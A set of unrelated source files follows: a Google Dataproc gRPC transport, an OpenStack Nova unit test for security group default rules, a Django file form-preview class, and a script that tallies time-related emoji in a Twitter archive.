`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
The cluster must be in a
[``RUNNING``][google.cloud.dataproc.v1.ClusterStatus.State]
state or an error is returned.
Returns:
Callable[[~.UpdateClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_cluster" not in self._stubs:
self._stubs["update_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/UpdateCluster",
request_serializer=clusters.UpdateClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["update_cluster"]
@property
def stop_cluster(
self,
) -> Callable[[clusters.StopClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the stop cluster method over gRPC.
Stops a cluster in a project.
Returns:
Callable[[~.StopClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "stop_cluster" not in self._stubs:
self._stubs["stop_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/StopCluster",
request_serializer=clusters.StopClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["stop_cluster"]
@property
def start_cluster(
self,
) -> Callable[[clusters.StartClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the start cluster method over gRPC.
Starts a cluster in a project.
Returns:
Callable[[~.StartClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "start_cluster" not in self._stubs:
self._stubs["start_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/StartCluster",
request_serializer=clusters.StartClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["start_cluster"]
@property
def delete_cluster(
self,
) -> Callable[[clusters.DeleteClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the delete cluster method over gRPC.
Deletes a cluster in a project. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
Returns:
Callable[[~.DeleteClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_cluster" not in self._stubs:
self._stubs["delete_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/DeleteCluster",
request_serializer=clusters.DeleteClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_cluster"]
@property
def get_cluster(self) -> Callable[[clusters.GetClusterRequest], clusters.Cluster]:
r"""Return a callable for the get cluster method over gRPC.
Gets the resource representation for a cluster in a
project.
Returns:
Callable[[~.GetClusterRequest],
~.Cluster]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_cluster" not in self._stubs:
self._stubs["get_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/GetCluster",
request_serializer=clusters.GetClusterRequest.serialize,
response_deserializer=clusters.Cluster.deserialize,
)
return self._stubs["get_cluster"]
@property
def list_clusters(
self,
) -> Callable[[clusters.ListClustersRequest], clusters.ListClustersResponse]:
r"""Return a callable for the list clusters method over gRPC.
Lists all regions/{region}/clusters in a project
alphabetically.
Returns:
Callable[[~.ListClustersRequest],
~.ListClustersResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_clusters" not in self._stubs:
self._stubs["list_clusters"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/ListClusters",
request_serializer=clusters.ListClustersRequest.serialize,
response_deserializer=clusters.ListClustersResponse.deserialize,
)
return self._stubs["list_clusters"]
@property
def diagnose_cluster(
self,
) -> Callable[[clusters.DiagnoseClusterRequest], operations_pb2.Operation]:
r"""Return a callable for the diagnose cluster method over gRPC.
Gets cluster diagnostic information. The returned
[Operation.metadata][google.longrunning.Operation.metadata] will
be
`ClusterOperationMetadata <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#clusteroperationmetadata>`__.
After the operation completes,
[Operation.response][google.longrunning.Operation.response]
contains
`DiagnoseClusterResults <https://cloud.google.com/dataproc/docs/reference/rpc/google.cloud.dataproc.v1#diagnoseclusterresults>`__.
Returns:
Callable[[~.DiagnoseClusterRequest],
~.Operation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "diagnose_cluster" not in self._stubs:
self._stubs["diagnose_cluster"] = self.grpc_channel.unary_unary(
"/google.cloud.dataproc.v1.ClusterController/DiagnoseCluster",
request_serializer=clusters.DiagnoseClusterRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["diagnose_cluster"]
def close(self):
self.grpc_channel.close()
__all__ = ("ClusterControllerGrpcTransport",)
|
|
# Copyright 2013 Metacloud, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
import webob
from nova.api.openstack.compute.legacy_v2.contrib import \
security_group_default_rules as security_group_default_rules_v2
from nova.api.openstack.compute import \
security_group_default_rules as security_group_default_rules_v21
from nova import context
import nova.db
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
class AttrDict(dict):
def __getattr__(self, k):
return self[k]
def security_group_default_rule_template(**kwargs):
rule = kwargs.copy()
rule.setdefault('ip_protocol', 'TCP')
rule.setdefault('from_port', 22)
rule.setdefault('to_port', 22)
rule.setdefault('cidr', '10.10.10.0/24')
return rule
def security_group_default_rule_db(security_group_default_rule, id=None):
attrs = security_group_default_rule.copy()
if id is not None:
attrs['id'] = id
return AttrDict(attrs)
class TestSecurityGroupDefaultRulesNeutronV21(test.TestCase):
controller_cls = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController)
def setUp(self):
self.flags(security_group_api='neutron')
super(TestSecurityGroupDefaultRulesNeutronV21, self).setUp()
self.controller = self.controller_cls()
def test_create_security_group_default_rule_not_implemented_neutron(self):
sgr = security_group_default_rule_template()
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.create,
req, {'security_group_default_rule': sgr})
def test_security_group_default_rules_list_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.index,
req)
def test_security_group_default_rules_show_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.show,
req, '602ed77c-a076-4f9b-a617-f93b847b62c5')
def test_security_group_default_rules_delete_not_implemented_neutron(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.assertRaises(webob.exc.HTTPNotImplemented, self.controller.delete,
req, '602ed77c-a076-4f9b-a617-f93b847b62c5')
class TestSecurityGroupDefaultRulesNeutronV2(test.TestCase):
controller_cls = (security_group_default_rules_v2.
SecurityGroupDefaultRulesController)
class TestSecurityGroupDefaultRulesV21(test.TestCase):
controller_cls = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController)
def setUp(self):
super(TestSecurityGroupDefaultRulesV21, self).setUp()
self.controller = self.controller_cls()
self.req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules')
def test_create_security_group_default_rule(self):
sgr = security_group_default_rule_template()
sgr_dict = dict(security_group_default_rule=sgr)
res_dict = self.controller.create(self.req, sgr_dict)
security_group_default_rule = res_dict['security_group_default_rule']
self.assertEqual(security_group_default_rule['ip_protocol'],
sgr['ip_protocol'])
self.assertEqual(security_group_default_rule['from_port'],
sgr['from_port'])
self.assertEqual(security_group_default_rule['to_port'],
sgr['to_port'])
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
sgr['cidr'])
def test_create_security_group_default_rule_with_no_to_port(self):
sgr = security_group_default_rule_template()
del sgr['to_port']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_from_port(self):
sgr = security_group_default_rule_template()
del sgr['from_port']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_ip_protocol(self):
sgr = security_group_default_rule_template()
del sgr['ip_protocol']
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_cidr(self):
sgr = security_group_default_rule_template()
del sgr['cidr']
res_dict = self.controller.create(self.req,
{'security_group_default_rule': sgr})
security_group_default_rule = res_dict['security_group_default_rule']
self.assertNotEqual(security_group_default_rule['id'], 0)
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
'0.0.0.0/0')
def test_create_security_group_default_rule_with_blank_to_port(self):
sgr = security_group_default_rule_template(to_port='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_from_port(self):
sgr = security_group_default_rule_template(from_port='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_ip_protocol(self):
sgr = security_group_default_rule_template(ip_protocol='')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_blank_cidr(self):
sgr = security_group_default_rule_template(cidr='')
res_dict = self.controller.create(self.req,
{'security_group_default_rule': sgr})
security_group_default_rule = res_dict['security_group_default_rule']
self.assertNotEqual(security_group_default_rule['id'], 0)
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
'0.0.0.0/0')
def test_create_security_group_default_rule_non_numerical_to_port(self):
sgr = security_group_default_rule_template(to_port='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_non_numerical_from_port(self):
sgr = security_group_default_rule_template(from_port='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_ip_protocol(self):
sgr = security_group_default_rule_template(ip_protocol='invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_cidr(self):
sgr = security_group_default_rule_template(cidr='10.10.2222.0/24')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_to_port(self):
sgr = security_group_default_rule_template(to_port='666666')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_invalid_from_port(self):
sgr = security_group_default_rule_template(from_port='666666')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_create_security_group_default_rule_with_no_body(self):
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, self.req, None)
def test_create_duplicate_security_group_default_rule(self):
sgr = security_group_default_rule_template()
self.controller.create(self.req, {'security_group_default_rule': sgr})
self.assertRaises(webob.exc.HTTPConflict, self.controller.create,
self.req, {'security_group_default_rule': sgr})
def test_security_group_default_rules_list(self):
self.test_create_security_group_default_rule()
rules = [dict(id=1,
ip_protocol='TCP',
from_port=22,
to_port=22,
ip_range=dict(cidr='10.10.10.0/24'))]
expected = {'security_group_default_rules': rules}
res_dict = self.controller.index(self.req)
self.assertEqual(res_dict, expected)
@mock.patch('nova.db.security_group_default_rule_list',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rules_list(self,
mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, self.req)
def test_default_security_group_default_rule_show(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
res_dict = self.controller.show(self.req, '1')
security_group_default_rule = res_dict['security_group_default_rule']
self.assertEqual(security_group_default_rule['ip_protocol'],
sgr['ip_protocol'])
self.assertEqual(security_group_default_rule['to_port'],
sgr['to_port'])
self.assertEqual(security_group_default_rule['from_port'],
sgr['from_port'])
self.assertEqual(security_group_default_rule['ip_range']['cidr'],
sgr['cidr'])
@mock.patch('nova.db.security_group_default_rule_get',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rule_show(self,
mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, self.req, '1')
def test_delete_security_group_default_rule(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
self.called = False
def security_group_default_rule_destroy(context, id):
self.called = True
def return_security_group_default_rule(context, id):
self.assertEqual(sgr['id'], id)
return security_group_default_rule_db(sgr)
self.stubs.Set(nova.db, 'security_group_default_rule_destroy',
security_group_default_rule_destroy)
self.stubs.Set(nova.db, 'security_group_default_rule_get',
return_security_group_default_rule)
self.controller.delete(self.req, '1')
self.assertTrue(self.called)
@mock.patch('nova.db.security_group_default_rule_destroy',
side_effect=(exception.
SecurityGroupDefaultRuleNotFound("Rule Not Found")))
def test_non_existing_security_group_default_rule_delete(
self, mock_sec_grp_rule):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, self.req, '1')
def test_security_group_ensure_default(self):
sgr = security_group_default_rule_template(id=1)
self.test_create_security_group_default_rule()
ctxt = context.get_admin_context()
setattr(ctxt, 'project_id', 'new_project_id')
sg = nova.db.security_group_ensure_default(ctxt)
rules = nova.db.security_group_rule_get_by_security_group(ctxt, sg.id)
security_group_rule = rules[0]
self.assertEqual(sgr['id'], security_group_rule.id)
self.assertEqual(sgr['ip_protocol'], security_group_rule.protocol)
self.assertEqual(sgr['from_port'], security_group_rule.from_port)
self.assertEqual(sgr['to_port'], security_group_rule.to_port)
self.assertEqual(sgr['cidr'], security_group_rule.cidr)
class TestSecurityGroupDefaultRulesV2(test.TestCase):
controller_cls = (security_group_default_rules_v2.
SecurityGroupDefaultRulesController)
def setUp(self):
super(TestSecurityGroupDefaultRulesV2, self).setUp()
self.req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules', use_admin_context=True)
self.non_admin_req = fakes.HTTPRequest.blank(
'/v2/fake/os-security-group-default-rules')
def test_create_security_group_default_rules_with_non_admin(self):
self.controller = self.controller_cls()
sgr = security_group_default_rule_template()
sgr_dict = dict(security_group_default_rule=sgr)
self.assertRaises(exception.AdminRequired, self.controller.create,
self.non_admin_req, sgr_dict)
def test_delete_security_group_default_rules_with_non_admin(self):
self.controller = self.controller_cls()
self.assertRaises(exception.AdminRequired,
self.controller.delete, self.non_admin_req, 1)
class SecurityGroupDefaultRulesPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(SecurityGroupDefaultRulesPolicyEnforcementV21, self).setUp()
self.controller = (security_group_default_rules_v21.
SecurityGroupDefaultRulesController())
self.req = fakes.HTTPRequest.blank('')
def _common_policy_check(self, func, *arg, **kwarg):
rule_name = "os_compute_api:os-security-group-default-rules"
rule = {rule_name: "project:non_fake"}
self.policy.set_rules(rule)
exc = self.assertRaises(
exception.PolicyNotAuthorized, func, *arg, **kwarg)
self.assertEqual(
"Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
def test_create_policy_failed(self):
self._common_policy_check(self.controller.create, self.req, {})
def test_show_policy_failed(self):
self._common_policy_check(
self.controller.show, self.req, fakes.FAKE_UUID)
def test_delete_policy_failed(self):
self._common_policy_check(
self.controller.delete, self.req, fakes.FAKE_UUID)
def test_index_policy_failed(self):
self._common_policy_check(self.controller.index, self.req)
|
|
"""
File Formtools Preview application.
Based on django.contrib.formtools.FormPreview
"""
try:
import cPickle as pickle
except ImportError:
import pickle
from copy import deepcopy, copy
from django import forms
from django.conf import settings
from django.http import Http404
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.utils.hashcompat import md5_constructor
from django.utils.crypto import constant_time_compare
from file_formpreview.forms.decorators import preview_full_clean, post_full_clean
from file_formpreview.forms.utils import security_hash
from file_formpreview.forms.fields import *
from file_formpreview.forms.widgets import *
PREVIEW_SUFFIX = getattr(settings, 'PREVIEW_SUFFIX', '_preview') # suffix to preview fields
PATH_SUFFIX = getattr(settings, 'PATH_SUFFIX', '_path') # suffix to preview fields
AUTO_ID = 'formtools_%s' # Each form here uses this as its auto_id parameter.
__all__ = ('FileFormPreview',)
class FileFormPreview(object):
preview_template = 'file_formpreview/preview.html'
form_template = 'file_formpreview/form.html'
def __init__(self, form_klass):
"UPD: make self.form dynamic"
self._form_klass = form_klass
self.state = {}
@property
def form(self):
"""
Lazy evaluted Form class to inject some fields into form declaration
ONLY on the first stage.
It's a bit hacky, as the whole form.data is passed into
`form.FIELD_NEEDED_CUSTOM_PREVIEW.custom_widget.value_from_datadict`
But as it's used TWICE:
in BoundField.data (used to output preview stage) and
in _clean for fields
so, we CANNOT rewrite returned value
from `widget.value_from_datadict`
(it's used in validation further)
Btw, http.QueryDict is immutable, too
"""
assert getattr(self, 'method', None) is not None, \
'%(cls)s.form is used before %(cls)s calling. no %(cls).method defined' % \
{'cls':self.__class__.__name__}
assert getattr(self, 'stage', None) is not None, \
'%(cls)s.form is used before %(cls)s calling. no %(cls).stage defined' % \
{'cls':self.__class__.__name__}
#if not self._preview_form_klass:
bases = (self._form_klass,)
name = self._form_klass.__name__ + 'Preview'
namespace = self._form_klass.__dict__.copy()
additional_fields = {}
for fname, field in namespace['base_fields'].iteritems():
if isinstance(field, forms.FileField):
additional_fields.update({
fname + PATH_SUFFIX: PreviewPathField(
label='%s%s' % (fname, PATH_SUFFIX.lower()) ,
required=False)})
if isinstance(field, PreviewField):
additional_fields.update({
fname + PREVIEW_SUFFIX: forms.Field(
label='%s%s' % (fname, PREVIEW_SUFFIX.lower()),
required=False,
widget=((self.stage == 'preview' and self.method == 'post') and \
field.preview_widget or forms.HiddenInput))})
def init_wrapper(self, *args, **kwargs):
"""
Post init stage to update `fields` property
"""
super(self.__class__, self).__init__(*args, **kwargs)
self.fields.update(additional_fields)
self._preview_form_klass = type(name, bases, namespace)
self._preview_form_klass.__init__ = init_wrapper
if self.stage == 'preview' and self.method == 'post':
self._preview_form_klass.full_clean = preview_full_clean
elif self.stage == 'post' and self.method == 'post':
self._preview_form_klass.full_clean = post_full_clean
#assert self._form_klass.__dict__['base_fields'] != self._preview_form_klass.__dict__['base_fields'], 'preview & original forms are equal'
return self._preview_form_klass
def __call__(self, request, *args, **kwargs):
"UPD: store current stage"
self.stage = {'1': 'preview', '2': 'post'}.get(request.POST.get(self.unused_name('stage')), 'preview')
self.method = request.method.lower()
self.parse_params(*args, **kwargs)
try:
method = getattr(self, self.stage + '_' + request.method.lower())
except AttributeError:
raise Http404
return method(request)
def unused_name(self, name):
"""
Given a first-choice name, adds an underscore to the name until it
reaches a name that isn't claimed by any field in the form.
This is calculated rather than being hard-coded so that no field names
are off-limits for use in the form.
UPD: Fixed form class pointer
"""
while 1:
try:
f = self._form_klass.base_fields[name]
except KeyError:
break # This field name isn't being used by the form.
name += '_'
return name
def preview_get(self, request):
"Displays the form"
f = self.form(auto_id=self.get_auto_id(), initial=self.get_initial(request))
return render_to_response(self.form_template,
self.get_context(request, f),
context_instance=RequestContext(request))
def preview_post(self, request):
"""
Validates the POST data. If valid, displays the preview page. Else, redisplays form.
UPD: takes FILES, gives original form
"""
f = self.form(request.POST, request.FILES, auto_id=self.get_auto_id())
orig_form = self._form_klass(request.POST, request.FILES)
if f.is_valid():
context = self.get_context(request, f)
self.process_preview(request, f, context)
context['hash_field'] = self.unused_name('hash')
context['hash_value'] = self.security_hash(request, f)
context['original_form'] = orig_form
return render_to_response(self.preview_template, context, context_instance=RequestContext(request))
else:
context = self.get_context(request, orig_form)
return render_to_response(self.form_template, context, context_instance=RequestContext(request))
def _check_security_hash(self, token, request, form):
expected = self.security_hash(request, form)
if constant_time_compare(token, expected):
return True
else:
raise
return False
def post_post(self, request):
"""
Validates the POST data. If valid, calls done(). Else, redisplays form.
UPD: takes FILES
"""
f = self.form(request.POST, request.FILES, auto_id=self.get_auto_id())
if f.is_valid():
if not self._check_security_hash(request.POST.get(self.unused_name('hash'), ''),
request, f):
return self.failed_hash(request) # Security hash failed.
return self.done(request, f.cleaned_data)
else:
f = self._form_klass(request.POST, request.FILES, auto_id=self.get_auto_id())
return render_to_response(self.form_template,
self.get_context(request, f),
context_instance=RequestContext(request))
# METHODS SUBCLASSES MIGHT OVERRIDE IF APPROPRIATE ########################
def get_auto_id(self):
"""
Hook to override the ``auto_id`` kwarg for the form. Needed when
rendering two form previews in the same template.
"""
return AUTO_ID
def get_initial(self, request):
"""
Takes a request argument and returns a dictionary to pass to the form's
``initial`` kwarg when the form is being created from an HTTP get.
"""
return {}
def get_context(self, request, form):
"Context for template rendering."
return {'form': form, 'stage_field': self.unused_name('stage'), 'state': self.state}
def parse_params(self, *args, **kwargs):
"""
Given captured args and kwargs from the URLconf, saves something in
self.state and/or raises Http404 if necessary.
For example, this URLconf captures a user_id variable:
(r'^contact/(?P<user_id>\d{1,6})/$', MyFormPreview(MyForm)),
In this case, the kwargs variable in parse_params would be
{'user_id': 32} for a request to '/contact/32/'. You can use that
user_id to make sure it's a valid user and/or save it for later, for
use in done().
"""
pass
def process_preview(self, request, form, context):
"""
Given a validated form, performs any extra processing before displaying
the preview page, and saves any extra data in context.
"""
pass
def security_hash(self, request, form):
"""
Calculates the security hash for the given HttpRequest and Form instances.
Subclasses may want to take into account request-specific information,
such as the IP address.
"""
return security_hash(form)
def failed_hash(self, request):
"Returns an HttpResponse in the case of an invalid security hash."
return self.preview_post(request)
# METHODS SUBCLASSES MUST OVERRIDE ########################################
def done(self, request, cleaned_data):
"""
Does something with the cleaned_data and returns an
HttpResponseRedirect.
"""
raise NotImplementedError('You must define a done() method on your %s subclass.' % self.__class__.__name__)
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
Search a Twitter archive (from archive.org) to find all characters related to time.
Finds distributions of those and all other emoji in the tweets.
-p : Path to the Twitter archive
-d : How many days to search (for testing)
-hr : How many hours to search (for testing)
"""
import argparse
import multiprocessing
from timeit import default_timer as timer
import pandas as pd
from tqdm import tqdm
from twitter_search import find_all, find_all_if, sum_dicts
from twitter_search.data import get_all_files, read_zip, unpack_files
from twitter_search.unicode_codes import EMOJI_UNICODE
class Results:
"""Search results data class.
Attributes:
counter_total_match (int): Total number of tweets with a match character
counter_total_tweets (int): Total number of tweets
counter_total_tweets_wemoji (int): Total number of tweets with any emoji
counterdict_lang (dict): Distribution of tweet languages
counterdict_all_emoji (dict): Distribution of all emoji
counterdict_all_emoji_if_match (dict): Distribution of all emoji when match is found
"""
def __init__(self):
"""Initialize all counters to 0 and counter dicts to be empty."""
self.counter_total_tweets = 0
self.counter_total_tweets_wemoji = 0
self.counter_total_match = 0
self.counterdict_lang = {}
self.counterdict_all_emoji = {}
self.counterdict_all_emoji_if_match = {}
self.counterdict_all_emoji_if_clockfaces = {}
self.counterdict_all_emoji_if_hourglasses = {}
self.counterdict_all_emoji_if_soon = {}
self.counterdict_all_emoji_if_watch = {}
self.counterdict_all_emoji_if_stopwatch = {}
self.counterdict_all_emoji_if_mantelpiece_clock = {}
self.counterdict_all_emoji_if_timer_clock = {}
self.counterdict_all_emoji_if_alarm_clock = {}
def add_to(self, key, val, attr):
"""Adds a value to an given dictionary key for a given attribiute of the class.
Args:
key (str)
val (int)
attr (str)
"""
d = getattr(self, attr)
if key in d.keys():
d[key] += val
else:
d[key] = val
setattr(self, attr, d)
def worker(filename):
"""The worker function, invoked in a process.
Args:
filename (str): Zipped file of tweets to process
Returns:
Results
"""
results = Results()
for tweet in read_zip(filename):
# Count total number of tweets
results.counter_total_tweets += 1
# Count total numbers of emoji in tweet
all_emoji, all_count = find_all(tweet["text"])
if not all_emoji:
continue
results.counter_total_tweets_wemoji += 1
for i, c in enumerate(all_emoji):
if c in results.counterdict_all_emoji.keys():
results.counterdict_all_emoji[c] += all_count[i]
else:
results.counterdict_all_emoji[c] = all_count[i]
# Count total numbers of emoji in tweet when there is a match
all_emoji, all_count = find_all_if(tweet["text"], MATCHES_ALL)
if not all_emoji:
continue
results.counter_total_match += 1
for i, c in enumerate(all_emoji):
if c in results.counterdict_all_emoji_if_match.keys():
results.counterdict_all_emoji_if_match[c] += all_count[i]
else:
results.counterdict_all_emoji_if_match[c] = all_count[i]
try:
if tweet["lang"] in results.counterdict_lang.keys():
results.counterdict_lang[tweet["lang"]] += 1
else:
results.counterdict_lang[tweet["lang"]] = 1
except KeyError:
continue
# Count total numbers of emoji in tweet for each match subset
for group in MATCHES:
all_emoji, all_count = find_all_if(tweet["text"], MATCHES[group])
if not all_emoji:
continue
for i, c in enumerate(all_emoji):
attr_name = "counterdict_all_emoji_if_{}".format(group)
results.add_to(c, all_count[i], attr_name)
return results
def parse_cli_args():
"""Parse the require CLI arguments for the run.
Returns:
argparse.Namespace
"""
parser = argparse.ArgumentParser(
description="Search a Twitter archive (from archive.org)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"-p",
"--data_path",
default="/your/data/path/archive-twitter-2016-08/",
help="Path to the Twitter archive",
)
parser.add_argument(
"-d", "--days", type=int, default=31, help="How many days to search (for testing)"
)
parser.add_argument(
"-hr", "--hours", type=int, default=24, help="How many hours to search (for testing)"
)
parser.add_argument(
"-u", "--unpack", default=False, action="store_true", help="Unpack tar files"
)
return parser.parse_args()
def run():
"""Run the full search.
Returns:
Results
"""
start_t = timer()
# Global counters
results_global = Results()
# Set multiprocessing cpu count
number_of_processes = multiprocessing.cpu_count()
multiprocessing.freeze_support() # Prevent an error on Windows
# Create pool of processes
pool = multiprocessing.Pool(number_of_processes)
try:
# Run worker functions and use tqdm progress bar
processes = pool.imap_unordered(worker, all_files, chunksize=10)
for results in tqdm(processes, total=len(all_files), unit="files"):
if results is None:
continue
# Update all global counters
results_global.counter_total_tweets += results.counter_total_tweets
results_global.counter_total_tweets_wemoji += results.counter_total_tweets_wemoji
results_global.counter_total_match += results.counter_total_match
results_global.counterdict_lang = sum_dicts(
results_global.counterdict_lang, results.counterdict_lang
)
results_global.counterdict_all_emoji = sum_dicts(
results_global.counterdict_all_emoji, results.counterdict_all_emoji
)
results_global.counterdict_all_emoji_if_match = sum_dicts(
results_global.counterdict_all_emoji_if_match,
results.counterdict_all_emoji_if_match
)
results_global.counterdict_all_emoji_if_clockfaces = sum_dicts(
results_global.counterdict_all_emoji_if_clockfaces,
results.counterdict_all_emoji_if_clockfaces
)
results_global.counterdict_all_emoji_if_hourglasses = sum_dicts(
results_global.counterdict_all_emoji_if_hourglasses,
results.counterdict_all_emoji_if_hourglasses
)
results_global.counterdict_all_emoji_if_soon = sum_dicts(
results_global.counterdict_all_emoji_if_soon,
results.counterdict_all_emoji_if_soon
)
results_global.counterdict_all_emoji_if_watch = sum_dicts(
results_global.counterdict_all_emoji_if_watch,
results.counterdict_all_emoji_if_watch
)
results_global.counterdict_all_emoji_if_stopwatch = sum_dicts(
results_global.counterdict_all_emoji_if_stopwatch,
results.counterdict_all_emoji_if_stopwatch
)
results_global.counterdict_all_emoji_if_mantelpiece_clock = sum_dicts(
results_global.counterdict_all_emoji_if_mantelpiece_clock,
results.counterdict_all_emoji_if_mantelpiece_clock
)
results_global.counterdict_all_emoji_if_timer_clock = sum_dicts(
results_global.counterdict_all_emoji_if_timer_clock,
results.counterdict_all_emoji_if_timer_clock
)
results_global.counterdict_all_emoji_if_alarm_clock = sum_dicts(
results_global.counterdict_all_emoji_if_alarm_clock,
results.counterdict_all_emoji_if_alarm_clock
)
except KeyboardInterrupt:
print("KeyboardInterrupt")
finally:
pool.terminate()
pool.join()
end_t = timer()
# Print outputs of the search run
print("Elapsed Time : {:.2f} min".format((end_t - start_t) / 60))
print("Total Tweets : {:d}".format(results_global.counter_total_tweets))
print("Total Tweets w/ Emoji : {:d}".format(results_global.counter_total_tweets_wemoji))
print("Total Tweets w/ Match : {:d}".format(results_global.counter_total_match))
return results_global
def save_results(results):
"""Save results to csv."""
# Convert output to dataframe
df_lang = pd.DataFrame(list(results.counterdict_lang.items()), columns=["Lang", "Count"])
df_allemoji = pd.DataFrame(
list(results.counterdict_all_emoji.items()), columns=["Emoji", "Count"]
)
df_allemoji_match = pd.DataFrame(
list(results.counterdict_all_emoji_if_match.items()), columns=["Emoji", "Count"]
)
